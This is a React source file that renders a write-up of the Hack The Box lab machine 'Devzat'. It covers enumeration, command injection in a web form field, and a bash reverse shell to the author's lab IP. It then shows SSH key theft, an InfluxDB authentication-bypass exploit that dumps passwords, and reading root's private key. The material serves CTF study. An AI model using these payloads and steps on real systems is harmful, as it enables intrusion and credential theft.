import ReactMarkdown from 'react-markdown'
import remarkGfm from 'remark-gfm'
import {Prism as SyntaxHighlighter} from 'react-syntax-highlighter'
import {dracula} from 'react-syntax-highlighter/dist/esm/styles/prism'
import './htb.css'

const markdown = `
### Machine IP: 10.10.11.118

![](/writeups/Devzat/devzat_card.png)

Author: Arman
* https://github.com/ArmanHZ
* https://app.hackthebox.com/profile/318304

---

### Initial Enumeration
As always, we start with \`nmap\` port scan to see which ports and services are open for us to look at.

\`\`\`bash
$ mkdir nmap
$ nmap -sC -sV -v -oN nmap/initial_scan 10.10.11.118
\`\`\`

\`\`\`text
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://devzat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
8000/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-Go
\`\`\`

As we can see, we have 3 services running. 2 of them are SSH and one Apache HTTP server.

Before trying to do anything with the SSH services, let us first check out the web page.

---

### Web Page
If we look closely at the \`nmap\` results, we can see that \`nmap\` did not follow a redirect to http://devzat.htb/.
If we try to go to the page "http://10.10.11.118/", we won't be able to access anything. In my case, I get the following page with no way to accept the risk. 

![](/writeups/Devzat/firefox_error.png)

If we \`curl\` to the same address, we will get the same response as \`nmap\`.

So let us add the "devzat.htb" host to our \`/etc/hosts\` file.

\`\`\`bash
10.10.11.118 devzat.htb
\`\`\`

Now if we navigate to the page, we get the following:

![](/writeups/Devzat/devzat_page.png)

This is also a good to time to start some background directory and file enumeration on the website.
For the word list, we are going to use the "SecLists" (https://github.com/danielmiessler/SecLists) and for the tool, I prefer to use \`wfuzz\`, however, other tools such as \`gobuster\` are also good.

I like to start with raft-small word lists. They are usually good for quick hits. If not, we can always use larger or target specific word lists.

Let us continue to check out the web site while our scans are running.

We find some useful information such as how to join the chat application called the "Devzat".

![](/writeups/Devzat/devzat_ssh.png)

This also explains the 2nd SSH service which we saw on our \`nmap\` scan.

We also find the following:

![](/writeups/Devzat/devzat_mail.png)

Patrick is probably one of the employees and we should save his name somewhere.

Another important information is that they talk about development branches.

![](/writeups/Devzat/devzat_git.png)

This makes me think that there is a \`git\` directory or maybe even a subdomain somewhere.

Now that we have performed an initial look at the website, let us check our scans.

---

#### Directory Enumeration
\`\`\`bash
$ wfuzz -c -w raft-small-directories.txt --hc 404 http://devzat.htb/FUZZ
\`\`\`

![](/writeups/Devzat/directory_brute.png)

Looks like, we did not get anything useful. And accessing directories such as "javascript", gives us 403 error.

![](/writeups/Devzat/forbidden_error.png)

We also did not find any ".git" directories.

#### File Enumeration
\`\`\`bash
$ wfuzz -c -w raft-small-files.txt --hc 404 http://devzat.htb/FUZZ
\`\`\`

![](/writeups/Devzat/file_brute.png)

Again, nothing interesting. The "LICENSE.txt" is actually a license file and the "README.txt" file is for the UI.

---

### Exploring SSH Port 8000
Before attacking the web server some more, let us check out this app they are talking about.

We can connect to app with SSH and providing a username, let us use "patrick" as our username. Maybe we can login as him and have some admin abilities?

\`\`\`bash
$ ssh patrick@10.10.11.118 -p 8000
\`\`\`

We get the following error message (this might also be just my Linux setup):

\`\`\`text
Unable to negotiate with 10.10.11.118 port 8000: no matching host key type found. Their offer: ssh-rsa
\`\`\`

No problem, we can bypass it as follows:

\`\`\`bash
$ ssh -o HostKeyAlgorithms=ssh-rsa  patrick@10.10.11.118 -p 8000
\`\`\`

However, we get the following message:

\`\`\`text
Nickname reserved for local use, please choose a different one.
\`\`\`

If we pick any other name, we connect without any problem.

Now this app is interesting and if we google its name, it is actually a SSH messaging application (https://github.com/quackduck/devzat)
After looking at its GitHub page, specially the Issues page, I did not see any possible vulnerabilities with the application. Googleing for "Devzat exploits" also yields nothing.

In conclusion, the port 8000 is bait...

---

### Enumerating Subdomains
After enumerating some more files, directories and JavaScript files, I suddenly remembered about the Git directory or any version control directory. The website tells us that there are two branches. However, when we try to go to "http://git.devzat.htb/" we get the following redirect:

![](/writeups/Devzat/devzat_git_redirect.png)

But, let us do a subdomain enumeration anyway.

\`\`\`bash
# Using SecLists DNS directory.
$ wfuzz -c -w subdomains-top1million-5000.txt -u "http://devzat.htb/" -H "Host: FUZZ.devzat.htb" --hc 302
\`\`\`

![](/writeups/Devzat/pets_subdomain.png)

Interesting... Let us add "pets.devzat.htb" to our \`/etc/hosts\` file and navigate to the web page.

---

### Pets Subdomain
Navigating to the page "http://pets.devzat.htb/", we get:

![](/writeups/Devzat/pets_page.png)

Seems like there is one action which we can perform and that is to add pets.

Now, let us add a pet just to test how the web page reacts.

![](/writeups/Devzat/test_pet_request.png)

We can see that our "Test" pet cat is added and our request parameters were a name and a species.

Now we can give the pet a name such as \`"'/-_#\\\` so that maybe we can break something on the server.

![](/writeups/Devzat/add_pet_break.png)

Looks like we broke something. This is good and by the looks of the error message, bash is running our commands. However, this is just a guess at this point.

Let us try to get a RCE now.

![](/writeups/Devzat/fail_rce.png)

Looks like quotes were not the reason for an error response in the name field. Before we continue testing other combinations, let us also use the same command on the other parameter "species".

In order to do this, we could use \`curl\`, however, let us use \`Burp Suite\` for easier editing.
First we are going to make a test request and send it to the repeater tab. From there we will try to break the server again.

![](/writeups/Devzat/repeater_request.png)

This will be our request.

![](/writeups/Devzat/add_pet_break_2.png)

Interesting. We get an other error code.
So, definitely there is potential here. We just need to try different combinations.

---

### RCE
After some testings, we finally get RCE.

We had to use \`;ls\` without any quotes in the species field.

![](/writeups/Devzat/rce_1.png)

As we can see, we get the content of the current directory. Our next step is to get a "Reverse Shell".

---

### Reverse Shell
First, we need to find out our IP address. We can do it as follows:

\`\`\`bash
$ ip address
# It is tun0 interface and my IP is 10.10.16.5
\`\`\`

In a terminal we will listen for incoming connections using \`netcat\`

\`\`\`bash
$ nc -lvnp 9999 # Or any other port
\`\`\`

Now we will add the following command to in the species field:

\`\`\`bash
;bash -c 'bash -i >& /dev/tcp/10.10.16.5/9999 0>&1'
\`\`\`

Our request will hang and we will get a reverse shell.

![](/writeups/Devzat/reverse_shell.png)

We are in the "Pets" directory and if we \`cat\` the "main.go" file, we can see that the following function causes the vulnerability.

\`\`\`go
func loadCharacter(species string) string {
        cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
        stdoutStderr, err := cmd.CombinedOutput()
        if err != nil {
                return err.Error()
        }
        return string(stdoutStderr)
}
\`\`\`

Our species input is concatenated directly to the command string.

---

### Exploring the Patrick User

First off, if we go to Patrick's home directory, we can steal his SSH key. So let us do that and connect using SSH so that we don't have to stabilize our shell.

We can connect using Patrick's key as follows:

\`\`\`bash
$ ssh -i patrick-priv.key patrick@10.10.11.118
\`\`\`

At this point we should also run some enumeration scripts such as \`linpeas\` (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).

However, for this machine, it doesn't yield much information.

If we look at the \`/etc/passwd\` file or the \`/home\` directory, we can see that there is another user called "Catherine".

If you remember from our initial "Devzat" connection, we tried to login as Patrick and failed. Well now, since we are Patrick, let us try that again.

\`\`\`bash
$ ssh patrick@localhost -p 8000
\`\`\`

![](/writeups/Devzat/patrick_devzat_8000.png)

We get some previous messages among admin and Patrick. They are talking about "InfluxDB" which we should take a look at later. Maybe there is a vulnerability.
If we login using the admin account, we get the same conversation.

However, if we login using Catherine, we get a different one.

![](/writeups/Devzat/catherine_devzat_8000.png)

They talk about a development branch of the "Devzat" app which runs on the port 8443. We should also check that one out.

Let us connect as the Patrick user to the localhost instance.

\`\`\`bash
$ ssh patrick@localhost -p 8443
\`\`\`

![](/writeups/Devzat/patrick_devzat.png)

Again we get a conversation similar to our first one but slightly different. We get the "InfluxDB" version. Which is 1.7.5.
If we connect as admin, we get the same conversation.

Again, if we connect as Catherine, we get a different one.

![](/writeups/Devzat/catherine_devzat.png)

Patrick talks about a feature which he implemented to the "Devzat" app to read files and it might be vulnerable. However, we require a password to use it.
Let us check out the function regardless.

![](/writeups/Devzat/commands.png)

Right at the bottom, we can see the implemented feature which is in the alpha state.
Let us try to use it.

![](/writeups/Devzat/file_command.png)

We do not know the password. Breaking the function with different inputs also did not work.

They talk about a backup directory, which the password is in the sources. We should try to find it.
In order to find the backup directory (or files), we can utilize the \`find\` command.

\`\`\`bash
# This is the query which found the folder. We tried many different ones.
$ find / -type d -iname "*backup*" 2>/dev/null
\`\`\`

![](/writeups/Devzat/backups.png)

We found them. Unfortunately, they are owned by the Catherine user and we do not have read access.

---

### Investigating the InfluxDB

We can search for "InfluxDB" process using the \`ps\` command.

\`\`\`bash
$ ps -aux | grep "influx"
\`\`\`

![](/writeups/Devzat/influx_ps.png)

InfluxDB is run by the root user with the PID 1284. Unfortunately, we cannot track its port using \`netstat\`, since it won't show us the root user PIDs.
However, we can find interesting ports using \`netstat\` and test it to see if its "InfluxDB" or not.

\`\`\`bash
$ netstat -lvnp
\`\`\`

This command will show you the listening ports.
But, there is another way to automatically scan the ports using \`proxychains\` and \`nmap\`.

---

### Proxychains and Nmap Scan (Optional)
This part is optional. You can use \`netstat\` and manual testing.

First let us checkout \`proxychains.conf\` file to see which port it uses.
Use \`cat\` on the \`/etc/proxychains.conf\` and look for the \`socks4\` entry. In my case it is 9050.

Next step is to setup a "Dynamic Application-Level Port Forwarding" using \`SSH\`. This is done on your host.

\`\`\`bash
$ ssh -N -D 127.0.0.1:9050 -i patrick-priv.key patrick@10.10.11.118
\`\`\`

Now we can use \`nmap\` on our localhost to scan the target. The downside of "Dynamic Port forwarding" is that we can only use TCP protocol.

\`\`\`bash
$ proxychains nmap -sT -v 127.0.0.1 2>/dev/null
# Redirect the ProxyChains errors when the ports are closed.
\`\`\`

![](/writeups/Devzat/proxychains_nmap.png)

We know all the other ports, except 8086. However, we can check it out using various tools such as \`curl\`, \`nc\` or \`telnet\`.

There are two ways we can check it. On the target (Patrick) or using \`proxychains\` in our machine.

\`\`\`bash
# From Patrick's machine.
$ curl -v localhost:8086

# From our machine.
$ proxychains curl -v localhost:8086
\`\`\`

![](/writeups/Devzat/curl_influxdb.png)

And it is indeed "InfluxDB".

---

### Exploiting InfluxDB

A quick google search on "InfluxDB 1.7.5 exploit" gets us to a GitHub POC (https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)

Before following the instructions, it is a good idea to change our port forwarding from "Dynamic" to "Local" port forwarding to be able to use more protocols if needed.

\`\`\`bash
$ ssh -N -L localhost:8086:localhost:8086 -i patrick-priv.key patrick@10.10.11.118
\`\`\`

What this exploit does, is that it gets a users list from us and generates "JWT" payload using them. After that it brute forces the username.
We are going to use \`SecLists\` once again.

![](/writeups/Devzat/influx_exploit.png)

We get in!

There are two databases. We are going to use "devzat".
In order to see the tables, we have to use the following query:

\`\`\`sql
show MEASUREMENTS
\`\`\`

There is only one table and it is the "user" table.

Now we will use the following query to list the users:

\`\`\`sql
select * from "user"
\`\`\`

![](/writeups/Devzat/passwords.png)

We got the passwords!

---

### PWNing Catherine

Catherine's password is \`woBeeYareedahc7Oogeephies7Aiseci\`. So we can \`su\` to Catherine using that from Patrick user.

From the we can read the \`user.txt\` file.

---

### Root

Root is the easiest part.
We now have to do as Patrick said to Catherine and that is to use \`git diff\` on the backup files we have found.

But first, we need to get those files to our machine.
To do this, first go to the \`/var/backups\`  directory. In there we are going to setup a \`python\` HTTP server and use \`wget\` from our machine to download the zip files.

\`\`\`bash
# From Catherine's machine
$ python3 -m http.server 9999

# From our machine
$ wget http://10.10.11.118:9999/devzat-dev.zip
$ wget http://10.10.11.118:9999/devzat-main.zip
\`\`\`

Now we uzip the files and use \`git diff\`.

After reading the diff, we see the following:

\`\`\`go
// Check my secure password
if pass != "CeilingCatStillAThingIn2021?" {
	u.system("You did provide the wrong password")
	return
}
\`\`\`

Now if we SSH into the dev branch of "Devzat" and use the file command with the password on the \`/root/.ssh/id_rsa\` we can SSH in as the root user.

![](/writeups/Devzat/rooted.png)
`;

export default function Devzat() {
  return (
    <div className='writeup-div'>
      <ReactMarkdown
      children={markdown}
      remarkPlugins={[remarkGfm]}
      components={{
        code({node, inline, className, children, ...props}) {
          const match = /language-(\w+)/.exec(className || '')
          return !inline && match ? (
            // @ts-ignore
            <SyntaxHighlighter children={String(children).replace(/\n$/, '')} style={dracula} language={match[1]} PreTag="div" {...props} />
          ) : (
            <code className={className} {...props}>
              {children}
            </code>
          )
        }
      }}
      />
    </div>
  )
}